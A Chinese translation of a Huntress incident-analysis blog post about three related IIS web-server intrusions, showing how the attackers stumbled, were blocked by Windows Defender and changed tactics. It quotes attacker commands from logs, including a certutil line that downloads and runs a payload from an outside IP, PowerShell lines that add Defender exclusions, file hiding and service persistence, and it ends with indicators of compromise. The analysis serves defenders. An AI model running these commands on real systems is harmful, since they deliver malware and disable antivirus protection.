文章总结： 文章通过三个真实案例分析指出，威胁行为者并不总是如报告般精密，常面临命令失败、拼写错误及杀毒软件拦截等障碍。攻击者通过试错法和吸取教训调整策略，如禁用WindowsDefender。建议防御者关注攻击者的具体应对行为与试错过程，以更好预判其后续动向。 综合评分： 90 文章分类： 应急响应,恶意软件,威胁情报,内网渗透,红队

试用、出错与拼写错误：为何有些恶意软件攻击并非你想象中的’精密’

Harlan Carvey

securitainment

2026年1月2日 14:50 中国香港

“威胁行为者正变得越来越先进、越来越复杂，并且不断改变其攻击策略。”

这是当前公众对恶意网络攻击激增现象的普遍看法。公开的安全报告往往让威胁行为者显得组织严密，似乎他们的攻击行动如同剧本般顺畅有序，从不遭遇任何障碍，总能直奔目标——无论是窃取数据还是部署勒索软件。

然而，事实并非如此。

通过 EDR 遥测数据或 Windows 事件日志深入分析威胁行为者的具体操作步骤，我们常常会发现，他们并非按照精心预设的无缝剧本行动，而是频繁地进行试错、应对突发状况，或者针对失败做出调整。

例如，我们在 Huntress 团队于 11 月强调的一起事件中看到威胁行为者的一系列失误，该事件涉及 Velociraptor 数字取证和事件响应 (DFIR) 平台。很容易认为攻击者采取了一系列无缝的步骤，最终成功部署了 Warlock 勒索软件。然而，深入查看 Windows 事件日志显示，威胁行为者曾多次尝试安装 Cloudflare 隧道 (最初未成功)、使用了拼写错误的命令，以及在未安装应用程序的情况下尝试运行 OpenSSH 服务器。

Windows 事件日志的真实情况：幕后揭秘

最近，三起独立事件进一步说明了威胁行为者如何在遭遇障碍后改进其方法。

Huntress 分析师在这三起事件中观察到非常相似的战术、技术和程序 (TTP),以及基础设施的相似性，这表明这些事件背后是同一个行为者。攻击者显然有着相似的目标，即使用特定工具集建立持久性。

威胁行为者或团体似乎发现了 Web 应用程序中的漏洞，使他们能够通过 Web 服务器在终端上运行命令。所有三起事件至少在最初都涉及一组类似的活动，即尝试在终端上执行名为 agent.exe的 Golang 木马。

在这三起事件中，访问的网页或 Web 应用程序没有明显的共性：在每起事件中，虽然攻击似乎通过 Web 服务器发生，但每个终端访问的页面都不同。这不太可能表明通过文件写入/上传漏洞在终端上放置了 Web shell，而更可能是页面代码中的某些缺陷被利用了。

在此背景下，这些事件中更值得注意的部分之一是威胁行为者在幕后遭遇环境中的”挑战”(如 Windows Defender) 或犯错 (如无法启动可执行文件) 时的行为方式。

事件 1

11 月 6 日，Huntress 报告了一起针对住宅开发公司的攻击，该攻击源自 Microsoft Internet Information Server (IIS) Web 服务器进程 w3wp.exe。虽然很容易将此事件视为一次直接的 Web 服务器入侵导致 Web shell 部署，但仔细调查却讲述了一个截然不同的故事。

图 1 显示了通过 EDR 检测到的威胁行为者通过 Web 服务器进程运行 whoami.exe命令。

图 1:Whoami.exe 进程谱系

该终端安装了 Microsoft Sysmon 系统监控应用程序以及 Huntress EDR 产品。因此，使用 EDR 遥测、相关 IIS Web 服务器日志条目和 Windows 事件日志记录开发了活动时间线，为事件提供了重要而详细的洞察。在我们看到 whoami.exe命令运行之前不久，可以看到以下 Web 服务器日志条目，标志着命令执行的初始点：

POST /[REDACTED]/login.aspx ReturnUrl=[REDACTED] 443 - 188.253.126.205 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 473

在 whoami.exe命令之后，我们看到诸如 netstat -an、net user admin$、ipconfig /all和 net localgroup administrators等命令正在运行，执行枚举操作。然后我们看到以下命令行，被 Windows Defender 检测并阻止：

""cmd"" /c certutil.exe -urlcache -split -f http://110.172.104[.]95:8000/api/download/windows-tools/amd64 C:\Users\Public\agent.exe && start /b C:\Users\Public\agent.exe

此命令旨在使用 Living Off The Land 二进制文件 (LOLBin) certutil.exe下载并解码资源到 C:\Users\Public\agent.exe,然后启动 agent.exe文件。根据 VirusTotal,下载的 IP 地址 (110.172.104.95) 位于大韩民国，并且以与恶意软件相关而闻名。然而，威胁行为者在这里遇到了第一个障碍，如前所述，命令被 Microsoft Defender 阻止。

在时间线中这些记录之后不久，Sysmon 记录显示执行了以下命令：

""cmd"" /c dir c:\users\public

""cmd"" /c c:\users\public\815.exe

没有明确的迹象表明文件 815.exe是如何传输到终端的，但威胁行为者似乎在没有被 Windows Defender 检测到的情况下多次尝试执行该文件，也没有以任何方式禁用或抑制 Windows Defender。没有 Windows 事件日志记录表明程序崩溃或遇到任何其他问题，但调查时间线显示在攻击者最终成功之前，曾有三次尝试启动可执行文件。

从终端检索到该可执行文件的副本，发现它是用 Go 编写的。将哈希值提交到 VirusTotal 没有表明该文件曾被提交进行分析。

如图 1 所示，威胁行为者启动原始 whoami.exe命令导致触发警报，因此，在 815.exe启动后不久，终端被隔离。

不幸的是，威胁行为者的活动并未就此停止。在企业能够对 /[REDACTED]/login.aspx网页进行代码审查之前还有一段时间，在此期间，威胁行为者返回了，Web 服务器日志中显示客户端 IP 地址为 188.253.126.202。12 月 1 日，启动了以下命令行：

C:/Users/Public/agent.exe C:/Users/Public/ca.bin

此命令行启动后不久，日志显示 Windows Defender 将 agent.exe识别为潜在不需要的应用程序 (PUA),但未采取任何行动。然后，在 Windows Defender 更新后近 48 小时，该文件被检测为 “ShellcodeRunner” 并被隔离，如图 2 所示。

图 2:Windows Defender 检测到 “ShellcodeRunner”

12 月 3 日的 Windows Defender 检测和隔离事件与 Sysmon 事件 ID 5 记录聚集在一起，表明 agent.exe进程已被终止。

这个障碍并没有阻止威胁行为者:12 月 8 日，他们再次通过相同方式返回。这次，Web 服务器日志中的客户端 IP 地址是 103.36.25.171，并且在终端上放置了免费提供的 GotoHTTP RMM 工具的重命名副本。

图 3:GotoHTTP 检测

在实施隔离并删除 RMM 之前，终端上的活动网络连接显示与 103.36.25.171 的连接。第一起事件中观察到的步骤显示，威胁行为者既进行了失败的命令和可执行文件安装尝试，又面临 Windows Defender 隔离导致的障碍。然而，这些并没有阻止攻击者，因为他们继续通过相同的访问方法返回终端。

事件 2

11 月 17 日，Huntress 报告了一起针对制造业客户的攻击，该攻击源自 Microsoft Internet Information Server (IIS) Web 服务器进程 w3wp.exe;此次攻击包括禁用安全工具。此事件的初始检测是通过图 4 所示的进程树运行的可执行文件 test.exe。

图 4:进程树

进程树中 agent.exe的 SHA256 哈希值被提交到 VirusTotal，结果摘录如图 5 所示。

图 5:VirusTotal 摘录

此进程启动后约 30 秒，检测到一系列 PowerShell 命令设置，然后检查各种 Windows Defender 排除项;这些检测显示如下：

powershell -command Add-MpPreference -ExclusionPath C:\users\public -ExclusionExtension .exe, .bin, .dll -Force

powershell -command Add-MpPreference -ExclusionPath C:\windows\system32\0409 -ExclusionExtension .exe, .bin, .dll -Force

powershell -command Add-MpPreference -ExclusionPath C:\windows\system32\inetsrv -ExclusionExtension .exe, .bin, .dll -Force

powershell -command Add-MpPreference -ExclusionPath C:\windows\syswow64\inetsrv -ExclusionExtension .exe, .bin, .dll -Force

powershell -command Get-MpPreference , Select-Object ExclusionPath, ExclusionExtension, ExclusionProcess

这一系列 PowerShell 命令与事件 1 形成鲜明对比，在事件 1 中，威胁行为者通过在终端上放置另一个可执行文件来应对其下载工具被 Windows Defender 隔离的情况。鉴于两起事件之间相似的 IP 地址和访问方法以及其他因素，威胁行为者似乎选择在将其恶意软件转移到终端之前通过添加排除项来解决 Windows Defender 的问题。

在 PowerShell 命令之后，通过图 6 所示的进程树启动了 attrib.exe。

图 6:Attrib.exe 命令进程树

检测到的 attrib.exe命令行如下：

attrib  C:\Windows\system32\0409\dllhost.exe   +s +h

根据哈希值比较，文件 dllhost.exe是 agent.exe的副本，在此事件中，通过 VirusTotal 被识别为 SparkRAT。

在 attrib.exe命令之后，服务控制管理器 (sc.exe) 被用于创建持久性，并将 dllhost.exe作为名为 WindowsUpdate 的 Windows 服务启动。然而，根据系统事件日志中随后的服务控制管理器记录，该服务未能启动，如以下时间线摘录所示：

2025-11-17 08:17:29Z

  EVTX  [REDACTED]  - Service Control Manager/7000;WindowsUpdate,%1053

  EVTX  [REDACTED]  - Service Control Manager/7009;300000,WindowsUpdate

2025-11-17 08:17:10Z

  EVTX  [REDACTED]  - Service Control Manager/7000;WindowsUpdate,%1053

  EVTX  [REDACTED]  - Service Control Manager/7009;300000,WindowsUpdate

2025-11-17 08:17:04Z

  EVTX  [REDACTED]  - Service Control Manager/7040;WindowsUpdate,demand start,auto start,WindowsUpdate

在调查此事件期间检索的 Web 服务器日志时，发现 11 月 16 日 (检测到活动的前一天) 对文件 /Login.aspx的 POST 命令，显示如下 (请注意 IP 地址 188.253.126.202，与事件 1 中的相同):

POST /Login.aspx ReturnUrl=[REDACTED] 443 - 188.253.126.202 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.2+(KHTML,+like+Gecko)+Chrome/22.0.1216.0+Safari/537.2 - 200 0 0 364

11 月 17 日，就在生成检测到的活动之前，Web 服务器日志条目显示对同一文件的 POST 命令，尽管来自不同的客户端 IP 地址，可能表明额外的威胁行为者基础设施。日志条目如下：

POST /Login.aspx ReturnUrl=[REDACTED] 443 - 103.36.25.169 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.1;+Trident/5.0)+chromeframe/10.0.648.205 - 200 0 0 406

在第二起事件中，我们可以看到威胁行为者试图纠正第一起事件中一些失败尝试的方式，主要是通过添加 Windows Defender 排除项。然而，他们仍然遇到了挑战，未能启动 WindowsUpdate 从而启动 dllhost.exe。

事件 3

11 月 25 日，Huntress 报告了一起针对企业共享服务组织客户的攻击，该攻击源自 Microsoft Internet Information Server (IIS) Web 服务器进程 w3wp.exe。导致启动 test.exe的进程树如图 7 所示。

图 7:进程树

该攻击包括报告的对 Web shell 的访问以及禁用安全工具，并遵循与事件 2 几乎相同的进展，具有相同的命令来向 Windows Defender 添加排除项，以及所有相同的可执行文件，包括安装基于 dllhost.exe的 Windows 服务，该服务也未能启动。

与其他两起事件类似，检测到的活动之前是对客户基础设施内网页的 POST 活动，如以下日志条目所示：

2025-11-25 07:49:23 [REDACTED]  POST / - 443 - 188.253.121.101 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_6_0)+AppleWebKit/537.4+(KHTML,+like+Gecko)+Chrome/22.0.1229.79+Safari/537.4 - - 200 0 64 10899

总结

纵观这三起事件，我们看到技术和基础设施方面的共性，包括相似的 IP 地址、恶意软件命名约定以及威胁行为者操作的文件夹。

然而，在第一起事件中，威胁行为者似乎没有尝试修改或禁用 Windows Defender，而是选择在遇到障碍和减速带 (恶意软件被检测并隔离) 时更改部署的工具。

在第二和第三起事件中，我们看到威胁行为者首先修改 Windows Defender 以促进后续活动，这显然是从 11 月 6 日第一起事件失败中吸取的教训。最终，攻击链因用于持久性的 Windows 服务未能启动而失败。

由于行业内反复的陈述，我们可能认为威胁行为者总是在改变其策略。然而，更仔细地观察多个事件中的行为，我们可以看到，有时这些被认为的策略”演变”实际上与威胁行为者或团体从以前的事件中实施的经验教训有关。其他时候，我们看到威胁行为者即使在技术不起作用时也继续依赖相同的技术。

对于防御者来说，了解威胁行为者面临的具体障碍，以及他们如何反应和转向，可以更好地洞察如何防范攻击者在返回和报复时的行为。

入侵指标 (IOC)

| 项目 | 描述 | | — | — | | C:\users\public\815.exe SHA256: 909460d974261be6cc86bbdfa27bd72ccaa66d5fa9cbae7e60d725df13d7e210 | 可执行文件 (事件 1) | | 110.172.104.95 | 尝试下载的 IP 地址 (事件 1) | | 188.253.126.205 , 188.253.126.202, 103.36.25.171 | Web 服务器日志客户端 IP 地址/网络连接 IP 地址，事件 1 | | agent.exe & dllhost.exe SHA256: 66a28bd3502b41480f36bd227ff5c2b75e0d41900457e5b46b00602ca2ea88cf | 可执行文件 (事件 2,3) VirusTotal 链接,识别为 Spark RAT | | Test.exe SHA256: 272de450450606d3c71a2d97c0fcccf862dfa6c76bca3e68fe2930d9decb33d2 | 可执行文件 (事件 2,3) VirusTotal 链接,识别为 ShellcodeRunner | | 188.253.126.202 , 103.36.25.169 | Web 服务器日志客户端 IP 地址，事件 2 | | 188.253.121.101 | Web 服务器日志客户端 IP 地址，事件 3 |

Trial, Error, and Typos: Why Some Malware Attacks Aren’t as ‘Sophisticated’ as You Think

免责声明：本博客文章仅用于教育和研究目的。提供的所有技术和代码示例旨在帮助防御者理解攻击手法并提高安全态势。请勿使用此信息访问或干扰您不拥有或没有明确测试权限的系统。未经授权的使用可能违反法律和道德准则。作者对因应用所讨论概念而导致的任何误用或损害不承担任何责任。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：securitainment Harlan Carvey《试用、出错与拼写错误：为何有些恶意软件攻击并非你想象中的’精密’》